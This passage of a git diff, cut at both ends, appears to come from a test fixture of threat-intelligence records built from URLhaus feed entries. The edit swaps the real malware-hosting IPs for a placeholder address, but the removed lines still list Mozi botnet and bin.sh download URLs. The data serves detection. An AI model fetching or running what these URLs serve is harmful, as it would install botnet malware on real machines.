listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24925,18 +24925,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://221.15.254.11:51095/bin.sh", + "original": "http://89.160.20.156:51095/bin.sh", "scheme": "http", "port": 51095, - "domain": "221.15.254.11", - "full": "http://221.15.254.11:51095/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51095/bin.sh" }, - "ip": "221.15.254.11" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694423220Z", - "original": "{\"id\":\"961033\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961033/\",\"url\":\"http://221.15.254.11:51095/bin.sh\",\"url_status\":\"online\",\"host\":\"221.15.254.11\",\"date_added\":\"2021-01-14 16:40:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.028277200Z", + "original": "{\"id\":\"961033\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961033/\",\"url\":\"http://89.160.20.156:51095/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:40:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24974,18 +24974,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://115.56.31.76:45117/i", + "original": "http://89.160.20.156:45117/i", "scheme": "http", "port": 45117, - "domain": "115.56.31.76", - "full": "http://115.56.31.76:45117/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45117/i" }, - "ip": "115.56.31.76" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694426917Z", - "original": "{\"id\":\"961034\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961034/\",\"url\":\"http://115.56.31.76:45117/i\",\"url_status\":\"online\",\"host\":\"115.56.31.76\",\"date_added\":\"2021-01-14 16:40:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.028284200Z", + "original": "{\"id\":\"961034\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961034/\",\"url\":\"http://89.160.20.156:45117/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:40:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25023,18 +25023,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.13.193.79:50204/Mozi.m", + "original": "http://89.160.20.156:50204/Mozi.m", "scheme": "http", "port": 50204, - "domain": "59.13.193.79", - "full": "http://59.13.193.79:50204/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50204/Mozi.m" }, - "ip": "59.13.193.79" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694430855Z", - "original": "{\"id\":\"961032\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961032/\",\"url\":\"http://59.13.193.79:50204/Mozi.m\",\"url_status\":\"online\",\"host\":\"59.13.193.79\",\"date_added\":\"2021-01-14 16:37:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028291200Z", + "original": "{\"id\":\"961032\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961032/\",\"url\":\"http://89.160.20.156:50204/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25072,18 +25072,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.93.18.69:45079/Mozi.m", + "original": "http://89.160.20.156:45079/Mozi.m", "scheme": "http", "port": 45079, - "domain": "59.93.18.69", - "full": "http://59.93.18.69:45079/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45079/Mozi.m" }, - "ip": "59.93.18.69" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694434401Z", - "original": "{\"id\":\"961029\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961029/\",\"url\":\"http://59.93.18.69:45079/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.93.18.69\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028299Z", + "original": "{\"id\":\"961029\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961029/\",\"url\":\"http://89.160.20.156:45079/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25121,18 +25121,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.136.43:52238/Mozi.m", + "original": "http://89.160.20.156:52238/Mozi.m", "scheme": "http", "port": 52238, - "domain": "59.99.136.43", - "full": "http://59.99.136.43:52238/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52238/Mozi.m" }, - "ip": "59.99.136.43" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694437758Z", - "original": "{\"id\":\"961030\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961030/\",\"url\":\"http://59.99.136.43:52238/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.136.43\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028306100Z", + "original": "{\"id\":\"961030\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961030/\",\"url\":\"http://89.160.20.156:52238/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25170,18 +25170,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.230.66.23:40312/Mozi.m", + "original": "http://89.160.20.156:40312/Mozi.m", "scheme": "http", "port": 40312, - "domain": "42.230.66.23", - "full": "http://42.230.66.23:40312/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40312/Mozi.m" }, - "ip": "42.230.66.23" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694441184Z", - "original": "{\"id\":\"961031\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961031/\",\"url\":\"http://42.230.66.23:40312/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.230.66.23\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028313Z", + "original": "{\"id\":\"961031\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961031/\",\"url\":\"http://89.160.20.156:40312/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25219,18 +25219,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://59.97.169.179:39002/Mozi.a", + "original": "http://89.160.20.156:39002/Mozi.a", "scheme": "http", "port": 39002, - "domain": "59.97.169.179", - "full": "http://59.97.169.179:39002/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39002/Mozi.a" }, - "ip": "59.97.169.179" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694444410Z", - "original": "{\"id\":\"961026\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961026/\",\"url\":\"http://59.97.169.179:39002/Mozi.a\",\"url_status\":\"offline\",\"host\":\"59.97.169.179\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028319900Z", + "original": "{\"id\":\"961026\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961026/\",\"url\":\"http://89.160.20.156:39002/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25268,18 +25268,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://27.41.216.92:50773/Mozi.m", + "original": "http://89.160.20.156:50773/Mozi.m", "scheme": "http", "port": 50773, - "domain": "27.41.216.92", - "full": "http://27.41.216.92:50773/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50773/Mozi.m" }, - "ip": "27.41.216.92" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694448648Z", - "original": "{\"id\":\"961027\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961027/\",\"url\":\"http://27.41.216.92:50773/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.41.216.92\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028326800Z", + "original": "{\"id\":\"961027\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961027/\",\"url\":\"http://89.160.20.156:50773/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25317,18 +25317,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.96.39.140:50050/Mozi.m", + "original": "http://89.160.20.156:50050/Mozi.m", "scheme": "http", "port": 50050, - "domain": "59.96.39.140", - "full": "http://59.96.39.140:50050/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50050/Mozi.m" }, - "ip": "59.96.39.140" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694452796Z", - "original": "{\"id\":\"961028\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961028/\",\"url\":\"http://59.96.39.140:50050/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.96.39.140\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028333700Z", + "original": "{\"id\":\"961028\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961028/\",\"url\":\"http://89.160.20.156:50050/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25366,18 +25366,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.59.203.162:60081/Mozi.m", + "original": "http://89.160.20.156:60081/Mozi.m", "scheme": "http", "port": 60081, - "domain": "182.59.203.162", - "full": "http://182.59.203.162:60081/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60081/Mozi.m" }, - "ip": "182.59.203.162" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694456473Z", - "original": "{\"id\":\"961024\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961024/\",\"url\":\"http://182.59.203.162:60081/Mozi.m\",\"url_status\":\"offline\",\"host\":\"182.59.203.162\",\"date_added\":\"2021-01-14 16:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028340600Z", + "original": "{\"id\":\"961024\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961024/\",\"url\":\"http://89.160.20.156:60081/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25415,18 +25415,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.122.4:58177/Mozi.m", + "original": "http://89.160.20.156:58177/Mozi.m", "scheme": "http", "port": 58177, - "domain": "186.33.122.4", - "full": "http://186.33.122.4:58177/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58177/Mozi.m" }, - "ip": "186.33.122.4" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694462865Z", - "original": "{\"id\":\"961025\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961025/\",\"url\":\"http://186.33.122.4:58177/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.122.4\",\"date_added\":\"2021-01-14 16:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028347500Z", + "original": "{\"id\":\"961025\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961025/\",\"url\":\"http://89.160.20.156:58177/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25464,18 +25464,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.41.164.93:38589/Mozi.m", + "original": "http://89.160.20.156:38589/Mozi.m", "scheme": "http", "port": 38589, - "domain": "125.41.164.93", - "full": "http://125.41.164.93:38589/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38589/Mozi.m" }, - "ip": "125.41.164.93" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694466301Z", - "original": "{\"id\":\"961023\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961023/\",\"url\":\"http://125.41.164.93:38589/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.41.164.93\",\"date_added\":\"2021-01-14 16:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028354800Z", + "original": "{\"id\":\"961023\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961023/\",\"url\":\"http://89.160.20.156:38589/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25513,18 +25513,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://182.120.42.220:39229/Mozi.a", + "original": "http://89.160.20.156:39229/Mozi.a", "scheme": "http", "port": 39229, - "domain": "182.120.42.220", - "full": "http://182.120.42.220:39229/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39229/Mozi.a" }, - "ip": "182.120.42.220" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694469698Z", - "original": "{\"id\":\"961022\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961022/\",\"url\":\"http://182.120.42.220:39229/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.120.42.220\",\"date_added\":\"2021-01-14 16:35:25 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028362400Z", + "original": "{\"id\":\"961022\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961022/\",\"url\":\"http://89.160.20.156:39229/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:25 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25562,18 +25562,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://121.181.32.38:53595/Mozi.a", + "original": "http://89.160.20.156:53595/Mozi.a", "scheme": "http", "port": 53595, - "domain": "121.181.32.38", - "full": "http://121.181.32.38:53595/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53595/Mozi.a" }, - "ip": "121.181.32.38" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694473154Z", - "original": "{\"id\":\"961021\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961021/\",\"url\":\"http://121.181.32.38:53595/Mozi.a\",\"url_status\":\"offline\",\"host\":\"121.181.32.38\",\"date_added\":\"2021-01-14 16:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028369400Z", + "original": "{\"id\":\"961021\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961021/\",\"url\":\"http://89.160.20.156:53595/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25611,18 +25611,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.119.207.249:57279/Mozi.m", + "original": "http://89.160.20.156:57279/Mozi.m", "scheme": "http", "port": 57279, - "domain": "182.119.207.249", - "full": "http://182.119.207.249:57279/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57279/Mozi.m" }, - "ip": "182.119.207.249" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694477302Z", - "original": "{\"id\":\"961018\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961018/\",\"url\":\"http://182.119.207.249:57279/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.119.207.249\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028376700Z", + "original": "{\"id\":\"961018\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961018/\",\"url\":\"http://89.160.20.156:57279/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25660,18 +25660,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.116.117.139:49019/Mozi.m", + "original": "http://89.160.20.156:49019/Mozi.m", "scheme": "http", "port": 49019, - "domain": "182.116.117.139", - "full": "http://182.116.117.139:49019/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49019/Mozi.m" }, - "ip": "182.116.117.139" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694480738Z", - "original": "{\"id\":\"961019\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961019/\",\"url\":\"http://182.116.117.139:49019/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.116.117.139\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028383700Z", + "original": "{\"id\":\"961019\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961019/\",\"url\":\"http://89.160.20.156:49019/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25709,18 +25709,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.121.150.84:48558/Mozi.m", + "original": "http://89.160.20.156:48558/Mozi.m", "scheme": "http", "port": 48558, - "domain": "182.121.150.84", - "full": "http://182.121.150.84:48558/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48558/Mozi.m" }, - "ip": "182.121.150.84" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694484075Z", - "original": "{\"id\":\"961020\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961020/\",\"url\":\"http://182.121.150.84:48558/Mozi.m\",\"url_status\":\"offline\",\"host\":\"182.121.150.84\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028390300Z", + "original": "{\"id\":\"961020\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961020/\",\"url\":\"http://89.160.20.156:48558/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25758,18 +25758,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://120.85.167.142:58913/Mozi.a", + "original": "http://89.160.20.156:58913/Mozi.a", "scheme": "http", "port": 58913, - "domain": "120.85.167.142", - "full": "http://120.85.167.142:58913/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58913/Mozi.a" }, - "ip": "120.85.167.142" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694487461Z", - "original": "{\"id\":\"961017\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961017/\",\"url\":\"http://120.85.167.142:58913/Mozi.a\",\"url_status\":\"online\",\"host\":\"120.85.167.142\",\"date_added\":\"2021-01-14 16:34:25 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028395Z", + "original": "{\"id\":\"961017\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961017/\",\"url\":\"http://89.160.20.156:58913/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:25 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25807,18 +25807,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.58.68.51:49608/Mozi.m", + "original": "http://89.160.20.156:49608/Mozi.m", "scheme": "http", "port": 49608, - "domain": "115.58.68.51", - "full": "http://115.58.68.51:49608/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49608/Mozi.m" }, - "ip": "115.58.68.51" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694490817Z", - "original": "{\"id\":\"961016\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961016/\",\"url\":\"http://115.58.68.51:49608/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.58.68.51\",\"date_added\":\"2021-01-14 16:34:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028399900Z", + "original": 